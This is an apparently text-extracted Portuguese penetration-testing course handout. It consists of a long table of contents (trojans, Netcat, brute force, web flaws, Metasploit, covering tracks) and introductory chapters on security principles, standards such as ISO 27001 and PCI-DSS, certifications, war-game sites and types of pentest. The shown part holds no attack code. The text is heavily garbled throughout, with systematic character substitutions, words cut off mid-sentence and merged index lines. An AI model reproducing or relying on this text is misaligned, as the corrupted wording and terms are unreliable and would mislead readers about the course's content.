Apostila - Pentest.pdf

Pen Test: Teste de Invasão em Redes Corporativas 406

www.4linux.com.b www.4linux.com.brr

- 2

Sumário Capítulo 1 Introdução à Segurança da Informação............... Informação.......................... ..................... ..................... ..................... ..................... .......................... ............... 12 1.1. Objetivos............ Objetivos....................... ..................... ..................... ..................... ..................... ..................... ..................... ............................................ ................................. 12 1.2. O que  segurança!............... segurança!.......................... ..................... ..................... ..................... ..................... ..................... ..................... ......................... .............. 1" 1.". Segurança da Informação.............. Informação......................... ..................... ..................... ..................... ..................... ..................................... .......................... 1# 1.#. $adr%es&'ormas.. $adr%es&'ormas............. ..................... ..................... ..................... ..................... ..................... ..................... ..................... ................................ ...................... 1( 1.#.1. 1.#.2. 1.#.". 1.#.#. 1.#.(. 1.#.0. 1.#.).

ISO 2)**1............................................................................................................................1( ISO 2)**2............................................................................................................................1( +asileia II.............................................................................................................................1( $CI,-SS...............................................................................................................................1( II/......................................................................................................................................10 CO+I..................................................................................................................................10 'IS ** Series...................................................................................................................10

1.(. $or que preisamos de segurança!............... segurança!.......................... ..................... ..................... ...................... ................................10 .....................10 1.0. $rinípios b3sios da segurança da informação........................ informação........................................................... ................................... 1) 1.0.1. 1.0.2. 1.0.". 1.0.#. 1.0.(. 1.0.0.

Confidenialidade................................................................................................................1) Integridade..........................................................................................................................1 -isponibilidade....................................................................................................................1 4utentiidade.......................................................................................................................1 /egalidade...........................................................................................................................1 erminologias de segurança................................................................................................15

1.). 4meaças e ataques............... ataques.......................... ..................... ..................... ..................... ..................... ..................... ..................... .......................... ............... 2* 1.. 6eanismos de segurança................ segurança.......................... ..................... ..................... ..................... ..................... .................................. ........................ 21 1..1. 6eanismos físios..............................................................................................................22 1..2. 6eanismos l7gios.............................................................................................................22

1.5. Serviços de segurança................ segurança.......................... ..................... ...................... ..................... .................................................. ........................................ 2" 1.1*. Certifiaç%es........... Certifiaç%es...................... ..................... ..................... ..................... ..................... ...................... ............................................... .................................... 2# 1.11. 8ar 9ames................. 9ames............................ ..................... ..................... ...................... ..................... ..................... ..................... ................................. ....................... 2( 1.11.1. 8ar 9ames des:top...........................................................................................................2( 1.11.2. 8ar 9ames online..............................................................................................................2(

1.12. ;a:er................... >a:er............................. ..................... ...................... ...............................2 ....................2 2.1. Objetivos?........... Objetivos?...................... ...................... ..................... ..................... ..................... ..................... ..................... .......................................... ................................ 2 2.2. @isão geral sobre o $entest...... $entest................. ...................... ..................... ..................... ..................... ..................... ................................ ..................... 25 2.". ipos de $entest........ $entest................... ..................... ..................... ..................... ..................... ..................... ..................... ..................................... .......................... 25

- 3 2.".1. 2.".2. 2.".". 2.".#. 2.".(. 2.".0.

+lind ...................................................................................................................................25 -ouble blind .......................................................................................................................25 9raA +o< ............................................................................................................................."* -ouble 9raA +o< ................................................................................................................."* andem ..............................................................................................................................."* Beversal .............................................................................................................................."*

2.#. 4s fases de um ataque............... ataque.......................... ..................... ..................... ...................... ..................... ..................... ..................... .................... .........."1 "1 2.#.1. 2.#.2. 2.#.". 2.#.#. 2.#.(.

/evantamento de Informaç%es ..........................................................................................."1 @arredura ............................................................................................................................"2 9anando aesso ................................................................................................................"" 6antendo aesso ................................................................................................................"" /impando rastros................................................................................................................."#

2.(. Categorias de ataques............... ataques......................... ..................... ...................... ..................... ..................... ..................... ..................... ..................... .........."# "# 2.(.1. Server Side 4tta:s............................................................................................................."# 2.(.2. Client Side 4tta:s.............................................................................................................."(

2.0. 6etodologias 6etodologias ea:ing............... >a:ing.......................... ..................... ..................... ..................... ..................... ..................... ..................... ..................... ............................... ..................... #( #.1. Objetivos............ Objetivos....................... ..................... ..................... ..................... ..................... ..................... ..................... ............................................ ................................. #( #.2. 9oogle >a:ing................ >a:ing.......................... ..................... ..................... ..................... ..................... ..................... ..................... .............................. .................... #0 #.". Comandos 4vançados 4vançados do 9oogle............... 9oogle......................... ..................... ...................... ..................... ..................... ..................... ............... .....#) #) #.".1. intitleE allintitle....................................................................................................................#) #.".2. inurlE allinurl........................................................................................................................#) #.".". filetApe.................................................................................................................................#) #.".#. allinte
- 4 #.".11. related...............................................................................................................................(*

#.#. 9oogle >a:ing -atabase................ -atabase........................... ..................... ..................... ...................... ..................... .................................. ........................ (* #.(. /evantamento /evantamento de informaç%es............. informaç%es........................ ..................... ..................... ..................... ......................................... ............................... (1 #.0. Contramedidas.......... Contramedidas..................... ..................... ..................... ..................... ..................... ..................... ..................... ..................................... .......................... (1 #.). $r3tia dirigida............... dirigida.......................... ..................... ..................... ..................... ..................... .................................................... ......................................... (2 Capítulo ( /evantamento /evantamento de Informaç%es............ Informaç%es....................... ..................... ..................... ..................... ..................... ..................... ................................ ...................... (# (.1. Objetivos............ Objetivos....................... ..................... ..................... ..................... ..................... ..................... ..................... ............................................ ................................. (# (.2. Footprint..... Footprint................ ..................... ..................... ..................... ..................... ..................... ..................... ................................................... ........................................ (( (.". $or onde omeçar!............... omeçar!.......................... ..................... ..................... ..................... ..................... ..................... ..................... .......................... ............... (( (.#. Consulta a informaç%es informaç%es de domínio......................... domínio.................................... ...................... ..................... ............................... ..................... (0 (.(. Consultando servidores servidores -'S.................. -'S............................. ..................... ..................... ..................... ...................................... ............................ ( (.0. Consultando Gebsites antigos............... antigos.......................... ..................... ..................... ..................... ..................... ..................... ................... ......... (5 (.). 8ebspiders............. ebspiders........................ ..................... ..................... ..................... ..................... ..................... ..................... ..................... ............................. ................... 0* (.. 'etraft.............. 'etraft......................... ..................... ..................... ..................... ..................... ..................... ..................... ..................... ................................. ....................... 0* (.5. +usando relaionamentos....... relaionamentos.................. ...................... ..................... ..................... .................................................... ......................................... 01 (.1*. $r3tia dirigida............... dirigida.......................... ..................... ..................... ...................... ..................... ................................................. ....................................... 02 (.11. Bastreamento de ;,mails.................... ;,mails.............................. ..................... ..................... ..................... ......................................... .............................. 0" (.12. Fingerprint............. Fingerprint....................... ..................... ..................... ..................... ..................... ..................... ..................... ..................... ............................ ................. 00 (.12.1. Fingerprint passivo............................................................................................................0) (.12.2. Fingerprint ativo................................................................................................................0) (.12.". -esobrindo -esobrindo um Sistema Operaional usando IC6$................................................... ......0 ...... 0 (.12.#. Calulando >O$.................................................................................................................0 (.12.(. Fingerprint atravs do
(.1". Contramedidas.......... Contramedidas..................... ..................... ..................... ..................... ..................... ...................... ..................... .................................. ........................ )* (.1#. $r3tia dirigida............... dirigida.......................... ..................... ..................... ...................... ..................... ................................................. ....................................... )* Capítulo 0 ;ntendendo a ;ngenaria Soial e o 'o,e 'o,e >a:ing............................ >a:ing...................................... ...............................)2 .....................)2 0.1. Objetivos............ Objetivos....................... ..................... ..................... ..................... ..................... ..................... ..................... ............................................ ................................. )2 0.2. O que  ;ngenaria Soial! ..................... ............................... ..................... ...................... ..................... .................................... .......................... )" 0.". ipos de ;ngenaria Soial................ Soial.......................... ..................... ..................... ..................... ..................... ..................... ....................... ............)" )" 0.".1. +aseada em pessoas............................................................................................................)" 0.".2. +aseada em omputadores..................................................................................................)"

0.#. Formas Formas de ataque............... ataque......................... ..................... ..................... ..................... ..................... ..................... ..................... ..................... .................. ....... )# 0.#.1. 0.#.2. 0.#.". 0.#.#.

Insider 4tta:s ....................................................................................................................)# Boubo de identidade ...........................................................................................................)# $ising Sam ....................................................................................................................)# HB/ Obfusation .................................................................................................................)(

- 5 0.#.(. -umpster -iving .................................................................................................................)( 0.#.0. $ersuasão.............................................................................................................................)(

0.(. ;ngenaria Soial Beversa................ Beversa........................... ..................... ..................... ..................... ........................................... ................................. )0 0.0. 'o e >a:ing................ >a:ing........................... ..................... ..................... ..................... ..................... ..................... ..................... ............................ ................. )0 0.). Contramedidas.......... Contramedidas..................... ..................... ..................... ..................... ..................... ..................... ..................... ..................................... .......................... )) 0.. ;
).0. $r3tia dirigida............... dirigida.......................... ..................... ..................... ..................... ..................... .................................................... ......................................... ( ).0.1. 6apeando portas abertas em um servidor..........................................................................(

).). unelamento.......... unelamento..................... ..................... ..................... ..................... ..................... ...................... .................................................. ....................................... ) ).. $r3tia dirigida............... dirigida.......................... ..................... ..................... ..................... ..................... .................................................... .........................................  )..1. unelando om o 'etat......................................................................................................

).5. 4nonAmiDer........... 4nonAmiDer..................... ..................... ..................... ..................... ..................... ..................... ..................... ......................................... ............................... 5 ).1*. $r3tia dirigida............... dirigida.......................... ..................... ..................... ...................... ..................... ................................................. ....................................... 5* ).1*.1. 'avegando anonimamente................................................................................................5*

).11. Contramedidas Contramedidas .................... ............................... ..................... ..................... ..................... ..................... ..................... .................................. ........................ 5* Capítulo  ;numeração de informaç%es informaç%es e serviços................ serviços.......................... ..................... ..................... ..................... .................................... ......................... 51 .1. Objetivos............ Objetivos....................... ..................... ..................... ..................... ..................... ..................... ..................... ............................................ ................................. 51 .2. ;numeração............. ;numeração........................ ..................... ..................... ...................... ..................... ..................... ..................... ..................................... ........................... 52 .". 4quisição de banners................. banners............................ ..................... ..................... ..................... ..................... ......................................... .............................. 52 .".1. nias l3ssias................................................................................................................52 .".2. Ferramentas........................................................................................................................5"

.#. $r3tia dirigida............... dirigida.......................... ..................... ..................... ..................... ..................... .................................................... ......................................... 5# .#.1. Capturando banner de apliaç%es de forma ativaJ.............................................................5#

.(. 6apeando grafiamente a rede................... rede............................. ..................... ...................... ............................................ ................................. 5(

- 6 .(.1. /anmap e Ceops ...............................................................................................................5( .(.2. 4utoSan.............................................................................................................................50 .(.". 6altego................................................................................................................................50

.0. -esobrindo @ulnerabilidades...................................................................................... 5) .0.1. 'essus.................................................................................................................................5)

.). $r3tia dirigida............................................................................................................. 5) .).1. Instalando o 'essus.............................................................................................................5) .).2. Begistrando e iniiando.......................................................................................................5

.. -efinindo vetores de ataque......................................................................................... 5 .5. $r3tia dirigida............................................................................................................. 55 .1*. Contramedidas.......................................................................................................... 1** Capítulo 5 rojansE +a:doorsE @írusE Boot:its e 8orms........................................................................1*1 5.1. Objetivos..................................................................................................................... 1*1 5.2. +a:door..................................................................................................................... 1*2 5.". Cavalo de r7ia ou rojan >orse ...............................................................................1*2 5.#. Boot:its ...................................................................................................................... 1*" 5.(. @írus e Gorms ............................................................................................................ 1*# 5.0. 'etat.......................................................................................................................... 1*( 5.0.1. Opç%es do 'etat .............................................................................................................1*0 5.0.2. 'etat , HtiliDação.............................................................................................................1*) 5.0.". ;nadeando 'etats..........................................................................................................1*)

5.). eAlogger ................................................................................................................... 1* 5.. $r3tia dirigida........................................................................................................... 1*5 5.5. Contramedidas............................................................................................................ 11* Capítulo 1* Ignorando $roteç%es.............................................................................................................. 111 1*.1. Objetivos................................................................................................................... 111 1*.2. ;vasão de FireGall&I-S om 'map...........................................................................112 1*.". FireGall ester.......................................................................................................... 11" 1*.".1. Caraterístias? ...............................................................................................................11" 1*.".2. HtiliDação? .......................................................................................................................11" 1*.".". Sinta
1*.#. -etetando >oneApots.............................................................................................. 11# 1*.(. $r3tia dirigida......................................................................................................... 11( 1*.0. Contramedidas.......................................................................................................... 11( Capítulo 11 nias de Força +ruta......................................................................................................... 110

- 7 11.1. Objetivos................................................................................................................... 110 11.2. +rute Fore............................................................................................................... 11) 11.". 8ordlist..................................................................................................................... 11) 11.".1. -oGnload de 8ordlist .....................................................................................................11)

11.#. 9eração de 8ordlist ................................................................................................. 11 11.(. Pon e Bipper ....................................................................................................... 115 11.(.1. 6O-OS ...........................................................................................................................121 11.(.2. /I'>4 -; CO64'-O ....................................................................................................12" 11.(.". HS4'-O 4 F;BB46;'4 .............................................................................................12(

11.0. >C,>Adra ............................................................................................................... 120 11.0.1. Hsando o >Adra9........................................................................................................12) 11.0.2. >Adra no terminal............................................................................................................12)

11.). +ruteSS>2................................................................................................................ 125 11.. BainboG Cra:.......................................................................................................... 125 11.5. HtiliDando o BainboG Cra: para riação de BainboG ables..................................1"* 11.5.1. Introdução.......................................................................................................................1"* 11.5.2. $asso 1? usar o rtgen para gerar as rainboG tables. ......................................................1"1 11.5.". $asso 2? usar o rtsort para organiDar as rainboG tables ........................ ......................... 1"# 11.5.#. $asso "? usar o rra: para busar o onteQdo das rainboG tables................................1"(

11.1*. $r3tia dirigida....................................................................................................... 1"0 11.11. OSS66 Beomenda............................................................................................. 1"0 11.12. Contramedidas........................................................................................................ 1") Capítulo 12 @ulnerabilidades em apliaç%es Geb......................................................................................1" 12.1. Objetivos................................................................................................................... 1" 12.2. ;ntendendo a apliação Geb.....................................................................................1"5 12.". $or que  tão perigoso!............................................................................................. 1"5 12.#. $rinipais Classes de @ulnerabilidades.....................................................................1#1 12.#.1. Command Injetion..........................................................................................................1#1 12.#.2. Command Injet , Sell $>$ ...........................................................................................1#2 12.#.". SR/ Injetion ..................................................................................................................1#2 12.#.#. Cross,Site Sripting KSSJ ..............................................................................................1## 12.#.(. CSBF................................................................................................................................1#( 12.#.0. Inseure -iret Objet Beferene ..................................................................................1#0 12.#.). Fala de 4utentiação e gereniamento de sessão..................................... ..................... 1#) 12.#.. Inseure CrAptograpi Storage ....................................................................................1#5 12.#.5. Failure to Bestrit HB/ 4ess........................................................................................1(1

12.(. Ferramentas para e
- 8 12.). /aborat7rio  8eb9oat..............................................................................................1(" 12.).1. Soluç%es para os desafios ...............................................................................................1(#

12.. Contramedidas.......................................................................................................... 1(0 Capítulo 1" ;levação de $rivilgios /oais............................................................................................... 1() 1".1. Objetivos................................................................................................................... 1() 1".2. O que  esalada de privilgios!............................................................................... 1( 1".". $ossíveis alvos........................................................................................................... 1(5 1".#. $asso a passo............................................................................................................ 1(5 1".(. /aborat7rio................................................................................................................10* 1".(.1. -esafio 1..........................................................................................................................10* 1".(.2. -esafio 2..........................................................................................................................10*

1".0. Contramedidas.......................................................................................................... 10* Capítulo 1# estando o sistema................................................................................................................. 101 1#.1. Objetivos................................................................................................................... 101 1#.2. O que  negação de serviço!.....................................................................................102 1#.". -oS............................................................................................................................ 10" 1#.".1. ;
1#.#. --oS......................................................................................................................... 10( 1#.#.1. Ferramenta de --oS.......................................................................................................10)

1#.(. $rinipais tipos de ataques....................................................................................... 10 1#.(.1. $ing Flood........................................................................................................................10 1#.(.2. ST' Flood........................................................................................................................105 1#.(.". Smurf 4tta:....................................................................................................................1)1

1#.0. Beomendaç%es.........................................................................................................1)1 1#.). Sequestro de Sessão................................................................................................. 1)2 1#.).1. Ferramentas....................................................................................................................1)2

1#.. Contramedidas ......................................................................................................... 1)" 1#..1. Find -doS .......................................................................................................................1)#

Capítulo 1( nias de Sniffing............................................................................................................... 1)( 1(.1. Objetivos................................................................................................................... 1)( 1(.2. O que  um sniffer!................................................................................................... 1)0 1(.". Como surgiu o sniffer! ............................................................................................. 1)0 1(.#. 4rp Spoof ................................................................................................................. 1) 1(.(. SS/Strip.................................................................................................................... 1)5

- 9 1(.0. $rinipais protoolos vulner3veis a sniffer ..............................................................1* 1(.). $rinipais Ferramentas ............................................................................................ 11 1(.).1. 1(.).2. 1(.).". 1(.).#.

-sniff ..............................................................................................................................11 ;tterap ..........................................................................................................................11 C$-ump.........................................................................................................................12 8iresar:........................................................................................................................1"

1(.. -'S $arming ......................................................................................................... 1# 1(..1. 4taque -'S.....................................................................................................................1(

1(.5. $r3tia dirigida......................................................................................................... 1( 1(.1*. Contramedidas........................................................................................................ 10 Capítulo 10 4taques a Servidores 8;+.....................................................................................................1) 10.1. Objetivos................................................................................................................... 1) 10.2. ipos de ataques....................................................................................................... 1 10.2.1. -oS .................................................................................................................................1 10.2.2. --oS ...............................................................................................................................1

10.". Fingerprint em 8eb Server ......................................................................................15 10.".1. >ttprint ...........................................................................................................................15*

10.#. -esobrindo @ulnerabilidades om 'i:to ................................................................ 151 10.(. 4uditoria e ;
- 10 1.1. Objetivos................................................................................................................... 2*# 1.2. 6as afinalE o que  um e
15.0. enologia por detr3s do FrameGor:....................................................................... 21 15.). enologia do 6eterpreter $aAload ......................................................................... 22* 15.. 6etasploit e OSS66 em vídeo ..............................................................................221 15.5. 4tualiDando o 6etasploit........................................................................................... 222 15.1*. $rimeiros passos na utiliDação do 6etasploit ........................................................222 15.11. 4n3lise final............................................................................................................. 2"* 15.12. $r3tia dirigida....................................................................................................... 2"* 15.12.1. $aAload om 6eterpreter..............................................................................................2"* 15.12.2. eAlogging om 6eterpreter ........................................................................................2"" 15.12.". Sniffing om 6eterpreter .............................................................................................2"# 15.12.#. 6antendo o aesso .......................................................................................................2"( 15.12.(. $rintSreen ...................................................................................................................2"0 15.12.0. 6etasploit 4dobe ;
15.1". 4rmitage.................................................................................................................. 2## 15.1".1. Configuração do 4rmitage.............................................................................................2#( 15.1".2. @arrendo om o 4rmitage..............................................................................................2#) 15.1".". ;
15.1#. 8map Geb sanner................................................................................................. 2(" 15.1#.1. Configurando o 86ap...................................................................................................2(" 15.1#.2. 4diionando alvos..........................................................................................................2(# 15.1#.". @erifiando resultados...................................................................................................2((

15.1(. /aborat7rio 6etasploit ...........................................................................................2()

- 11 15.10. Contramedidas........................................................................................................ 2() Capítulo 2* 4pagando Bastros.................................................................................................................. 2( 2*.1. Objetivos................................................................................................................... 2( 2*.2. $or que enobrir rastros!..........................................................................................2(5 2*.". O que enobrir! ........................................................................................................2(5 2*.#. nias..................................................................................................................... 20* 2*.(. Ferramentas ............................................................................................................. 201 2*.0. Contramedidas.......................................................................................................... 202 Capítulo 21 -esafios? estes de Invasão................................................................................ 20" 21.1. Objetivo..................................................................................................................... 20" 21.2. -esafio 1................................................................................................................... 20# 21.". -esafio 2................................................................................................................... 20# 4';KOS................................................................................................................................. 20( $rimeiro ane
Segundo 4ne
Índice de tabelas Índice de Figuras

Capítulo 1 Introdução à Segurança da Inforação - 12

Capítulo 1 Introdução à Segurança da Inormação

1!1! "#$etivos ●

Forneer ao aluno uma visão geral sobre segurança da informação

●

;ntender a importUnia da segurança da informação no mundo de oje

●

Coneer as prinipais ameaças

●

Compreender a terminologia b3sia utiliDada

●

Coneer algumas ertifiaç%es da 3rea


1!%! " &ue ' segurança( Segundo o diion3rio da 8i:ipdiaE segurança  um substantivo femininoE que signifia? ●

Condição ou estado de estar seguro ou protegido.

●

Capaidade de manter seguro.

●

$roteção ontra a fuga ou esape.

●

$rofissional ou serviço respons3vel pela guarda e proteção de algo.

●

Confiança em si mesmo.

-entro do esopo om relação ao que iremos estudarE os trVs primeiros t7pios adequam,se perfeitamente ao que ser3 abordado ao longo do urso. 'o entantoE veremos esses aspetos na visão do ataanteE aquele que tem por objetivo justamente subverter a segurança. ; o que queremos proteger! @amos analisar o onte

juntamente om o apital. Ruem tina o maior nQmero de oper3riosE trabalando XinansavelmenteYE detina o poderE pois possuía maior apitalE gerado pela produção inessante das indQstrias. 'o entantoE omo tudo o que  ílio e est3 em onstante mudançaE o en3rio mundial novamente se alteraE iniialmente om o movimento iluminista. O IluminismoE a partir do sulo K@IIIE permeando a Bevolução IndustrialE prepara o terreno para a mudança de paradigma que est3 por vir. Os grandes inteletuais desse movimento tinam omo ideal a e
1!)! Segurança da Inormação 4 Segurança da Informação tem omo prinipal objetivoE justamenteE proteger as informaç%esE que são os prinipais ativos atualmenteE que sejam importantes para uma organiDação ou indivíduo.


;ntendendo esse oneitoE não  sufiiente apenas oneer as normas e
1!4! Padr*es+,ormas 1.4.1. ISO 27001 ;ssa norma aborda os padr%es para sistemas de gestão de segurança da informação. Substitui a norma +S ))55,2

1.4.2. ISO 27002 +aseada na norma ISO 2)**1E essa norma trata das boas pr3tias de segurança da informaçãoE onde india uma srie de possíveis ontroles dentro de ada onte
1.4.3. Basileia II = uma norma da 3rea finaneiraE oneida tambm omo 4ordo de Capital de +asileia II. ;ssa norma fi
1.4.4. PCI-DSS 4 norma $aAment Card IndustrA -ata SeuritA StandardE  uma padroniDação internaional da 3rea de segurança de informação definida pelo $aAment Card IndustrA SeuritA Standards Counil. ;ssa norma foi riada para au

1.4.5. ITIL = um onjunto de boas pr3tias para gestãoE operação e manutenção de serviços de IE apliados na infraestrutura. 4 II/ busa promover a gestão de I om foo no liente no serviçoE apresentando um onjunto abrangente de proessos e proedimentos gereniaisE organiDados em disiplinasE om os quais uma organiDação pode faDer sua gestão t3tia e operaional em vista de alançar o alinamento estratgio om os neg7ios.

1.4.6. COBIT -o inglVsE Control Objectives for Information and related Technology E  um guia de boas pr3tiasE omo um frameGor:E voltadas para a gestão de I. InluiE em sua estrutura de pr3tiasE um frameGor:E ontrole de objetivosE mapas de auditoriaE ferramentas para a sua implementação e um guia om tnias de gereniamento.

1.4.7. NIST 800 Series Srie de doumentosE guias e pesquisas desenvolvidos pelo 'ational Institute of Standards and enologAE voltadas para a 3rea de segurança da informação. ;ssa srie  omposta de doumentos onsiderados ZSpeial $ubliationsZE os quais abordam desde segurança na tenologia +luetootE at segurança em servidores. Dica: o documento desta série que é equivalente ao que estamos estudando ao longo desse curso, que pode inclusive representar uma metodologia específica, é o NIST 800-!"

1!-! Por &ue pre.isamos de segurança( ●

;volução da tenologia foando a failidade de uso Ruanto mais a tenologia evoluiE mais f3il torna,se a operação dos novos sistemas e ferramentas. P3 vai ao longe o tempo em que era neess3rio gravar de abeça (** omandos diferentes para utiliDar o omputador para as tarefas mais ostumeiras e simples do dia a dia. >oje em dia tudo est3 ao alane de um lique do mouseE e quando nãoE de um movimento de abeçaE se pensarmos nos sistemas de aptura de movimentos.

Capítulo 1 Introdução à Segurança da Inforação - 17 ●

4umento do uso de redes e interligação das apliaç%es udo est3 onetado atualmenteW ; quando uma m3quina ou sistema  omprometidoE tudo o que est3 ao seu redor orre o riso de ser omprometido tambm. Isso demanda uma maior apaidade de gereniamento do parque omputaionalE que rese e
●

-iminuição do nível de oneimento para a e
●

4umento da omple
administração

de

infraestrutura

de

Ruanto maior o parque omputaionalE mais difíil se torna seu gereniamentoE e disso surgem inQmeros problemas gravesE de onsequVnias desastrosas. Com o aumento da omple
1!6! Prin.ípios #/si.os da segurança da inormação 4 3rea de SI possui trVs pilares b3sios om o arsimo de mais duasE que permitem a troa segura de informaçãoE desde que nenum deles seja violado. São eles?

1.6.1. Confien!ialiae ;sse pilar  o respons3vel pelo ontrole de aesso à informação apenas por aquelas pessoas ou entidade que tenam permissão ompatível om sua função e


determinada pelo dono daquela informação.

1.6.2. In"e#riae 4quiE atravs dessa propriedadeE  determinada a neessidade de garantir que a informação mantena todas as suas araterístias originais omo determinadas pelo propriet3rio da informação.

1.6.3. Dis$oni%iliae $ropriedade que define que determinada informação esteja sempre disponível para o aesso quando neess3rioE de maneia íntegra e fidedigna. 4lguns dos ataques oneidos busam justamente derrubar a disponibilidadeE e para algumas empresas o simples fato de não ter suas informaç%es disponíveis durante determinado período de tempoE isso pode aarretar prejuíDos estrondosos.

1.6.4. &'"en"i!iae $ropriedade respons3vel por garantir que a informação vem da origem informadaE permitindo a omuniação segura e garantia de que a informação a qual tem aesso  orreta e de fonte onfi3vel.

1.6.5. Le#aliae = a propriedade que define se determinada informaçãoE ou operaçãoE est3 de aordo om as leis vigentes no país. 4s mesmas leis que regem um país podem ser ompletamente diferentes em outroE o que pode oasionar uma srie de problemasE aso o sistema de gestão não seja adapt3vel. $odemos ver na figura a seguir alguns dos distQrbios mais omuns aos pilares da SIE vinulados a ataques que visam à 3rea de I?


O nível de segurança desejadoE pode se onsubstaniar em uma polítia de segurança que  seguida pela organiDação ou pessoaE para garantir que uma veD estabeleidos os prinípiosE aquele nível desejado seja perseguido e mantido. = de e
1.6.6. Ter(inolo#ias e se#'ran)a ●

@ulnerabilidade  fragilidade que pode forneer uma porta de entrada a um ataante

●

4meaça  agente ou ação que se aproveita de uma vulnerabilidade

●

●

●

Biso  Impato K $robabilidadeJ da ameaça oorrer 4taque  InidVnia da ameaça sobre a vulnerabilidade ;

1!! meaças e ata&ues ;m segurança da informaçãoE preisamos estar atentos às possíveis ameaças que podemE de alguma maneiraE omprometer os pilares de SI. 4 partir das ameaçasE podemos ter noção dos risos que envolvem a atividade organiDaional. $ara ada tipo de atividadeE ou onte
●

●

●

4lagamento Baios 4essos indevidos -esabamentos ; no grupo das ameaças l7giasE podemos ontar as seguintes?

●

Infeção por vírus

●

4essos remotos à rede

●

@iolação de senas

4ssim omo dividimos as ameaças em dois grandes gruposE os ataques tambm podem ser divididos da mesma maneira? Internos e ;

vingança ou partiipam de alguma ação de espionagem industrialE vendendo as informaç%es onseguidas para o onorrente. Outro

tipo

de

ataque

vindo

de

XinsidersYE

surge

de

funion3rios

despreparadosE que sem o devido oneimento do funionamento do sistemaE ou das polítias organiDaionaisE age de maneira err\neaE ausando o omprometimento do sistema da empresa. Ruando vamos analisar os ataques e
;
●

;
●

;
em alta veloidade oorrer e atingir a janela de vidro.

1!2! 3e.anismos de segurança $ara mitigar ou diminuir sensivelmente as ameaçasE podemos empregar uma srie de dispositivos e meanismos de segurançaE sejam as ameaças físias ou


l7gias. $ara ada onte
1.8.1. *e!anis(os f+si!os ●

$ortas

●

ranas

●

$aredes

●

+lindagem

●

9uardas

●

CUmeras

●

Sistemas de alarme

●

Sistema de deteção de movimentos

●

+iometria

Os meanismos físios de proteçãoE são barreiras que limitam o ontato ou aesso direto a informação ou a infra,estrutura que garante a e
1.8.2. *e!anis(os l,#i!os ●

Criptografia

●

FireGall

●

4nti,@írus

●

I-S

●

I$S

●

$ro

4nti,Spam

Os meanismos l7giosE são barreiras que impedem ou limitam o aesso a informaçãoE que est3 em ambiente ontroladoE geralmente eletr\nioE e queE de outro modoE fiaria e
1!! Serviços de segurança ;
Criação de $olítias de Segurança

●

Implantação de CSIBs

●

>ardening de Servidores

●

●

●

4n3lise de @ulnerabilidade este de Invasão 4n3lise de 4pliação

●

$eríia Computaional

●

reinamento de Colaboradores

●

4uditoria


1!10! Certii.aç*es 'a 3rea de segurançaE 3 muitas ertifiaç%es reoneidas pelo merado. Sendo que ada ma delas possui um foo diferenteE nível de oneimento diferente e formas de avaliaç%es diversas. 4bai
CompTIA SeuritA]

●

Cisco Systems CC'4 SeuritA ^ CCS$ ^ CCI; SeuritA

●

EC-Council C;> ^ C>FI ^ ;CS4 ^ ;'S4 ^ /$

●

IAC

9SIF ^ 9S;C ^ 9CI4 ^ 9CF8 ^ 9CF4 ^ 9CI> ^ 9$;' ^ 9CHK ^ 9C8' ^ 984$ ^ 948' ^ 9B;6 ^ 9S; ●

ISACA CIS4 ^ CIS6

●

!ISC"# C4$ ^ CISS$ ^ CSS/$ ^ ISS4$ ^ ISS;$ ^ ISS6$ ^ SSC$

●

ISEC$% O$S4 ^ O$S

●

$ffensi&e Security OSC$ ^ OSC;

●

Immunity 'O$

-entro do onteQdo estudado e de aordo om o onte

abordados em aula. $odemos itarE dentre essasE as ertifiaç%es? ●

C;>E ;CS4E /$E O$S4E OSC$E 9$;'

1!11! 5ar ames $ara failitar e possibilitar a utiliDação das tnias aprendidas no ursoE sem ausar qualquer tipo de omprometimento a ambientes reaisE podemos utiliDar omo ferramenta o que  oneido omo 8ar 9ames? jogos que simulam ambientes reais e permitem oloar em pr3tia tnias de e
1.11.1. ar a(es es/"o$

●

Hplin:

●

>a:er ;volution

●

+S>a:er

●

Street >a:er

●

6ind/in:

●

CAber 8ars

1.11.2. ar a(es online

●

ttp?&&GGG.a:tissite.org&

●

ttp?&&GGG.a:quest.de&

●

ttp?&&GGG.a:#u.org&


ttp?&&GGG.mod,<.o.u:&main.pp

●

ttp?&&bigallenge.free.fr&

●

#ttp:$$%%%"#ac&ertest"net$


1!1%! 78er.í.ios te9ri.os 1  O que  um e
2  Rual a importUnia da segurança da informação nos dias de oje! ______________________________________________________________________ ______________________________________________________________________

"  Rue tipo de proteção pode ser utiliDar para manter a integridade de uma informação que trafega por meios não seguros! ______________________________________________________________________ ______________________________________________________________________

#  ;m qual norma podemos nos basear para implantar ontroles que podem proteger servidores de uma rede! ______________________________________________________________________


Capítulo % Introdução ao Teste de Invasão e ti.a ;a.
%!1! "#$etivos: ●

Forneer ao aluno uma visão geral sobre testes de invasão

●

;ntender a anatomia e os tipos diferentes de ataques

●

Coneer as fases de um teste de invasão

●

Coneer as metodologias e os aspetos legais

Capítulo 2 Introdução ao !e"te de In#a"ão e $t%&a 'a&(er - 29

%!%! =isão geral so#re o Pentest O este de Intrusão  um proesso de an3lise detalada do nível de segurança de um sistema ou rede usando a perspetiva de um infrator. rata,se de um teste realista ao nível de segurança das infra,estruturas e da informação que estas detVm. 'o este de Intrusão são testadas vulnerabilidades tnias e oneituais das infra, estruturas alvo. O objetivo prinipal  simular de forma ontrolada um ataque real que normalmente  e
%!)! Tipos de Pentest 2.3.1. Blin 'essa modalidade o auditor não onee nada sobre o alvo que ir3 ataarE porm o alvo sabe que ser3 ataado e o que ser3 feito durante o teste. O grande riso desse tipo de testeE  que o alvo pode avisar a equipe de I e deidirem faDer atualiDação do sistemaE apliar pats de orreção e segurança. ;sse tipo de pentest  interessante para ter oneimento de omo e quais informaç%es sobre a organiDação e sua infraestrutura  possível de um ataante ter aesso.

2.3.2. Do'%le %lin 'essa modalidade o auditor não onee nada sobre o alvoE e o alvo não sabe que ser3 ataado e tão pouo sabe quais testes o auditor ir3 realiDar. = o mtodo de pen test mais realista possívelE apro

infraestrutura.

2.3.3. ra Bo 'essa modalidade o auditor tem oneimento parial do alvoE e o alvo sabe que ser3 ataado e tambm sabe quais testes serão realiDados. 4pro
2.3.4. Do'%le ra Bo 'essa modalidade o auditor tem oneimento parial do alvoE e o alvo sabe que ser3 ataadoE pormE não sabe quais testes serão e
2.3.5. Tane( 'essa modalidade o auditor tem total oneimento sobre o alvoE o alvo sabe que ser3 ataado e o que ser3 feito durante o ataque. ambm oneido omo Xai
2.3.6. eersal 'essa modalidade o auditor tem oneimento total do alvoE porm o alvo não sabe que ser3 ataadoE e tão pouo sabe quais testes serão e

;sse formato de teste  ideal para testar a apaidade de resposta e omo est3 o timing de ação da equipe de resposta a inidentes do alvo.

